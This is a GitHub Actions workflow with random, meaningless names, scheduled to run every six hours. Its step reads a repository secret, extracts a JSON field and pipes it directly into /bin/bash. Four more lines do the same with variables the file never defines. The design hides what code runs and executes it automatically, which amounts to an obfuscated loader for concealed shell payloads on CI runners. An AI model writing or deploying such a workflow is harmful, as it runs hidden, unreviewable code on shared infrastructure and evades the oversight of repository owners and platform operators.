name: alarmingnecklace

on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: alarmingnecklace
        env:
          jdig61842: ${{ secrets.jdig61842 }}
        run: |
          echo $jdig61842 | jq -r .vcj547 | /bin/bash
          echo $vxkmo201 | jq -r .imw673 | /bin/bash
          echo $tvvi3368 | jq -r .smx1 | /bin/bash
          echo $m39512 | jq -r .chcze6825 | /bin/bash
          echo $nggb58576 | jq -r .ahyqi9595 | /bin/bash

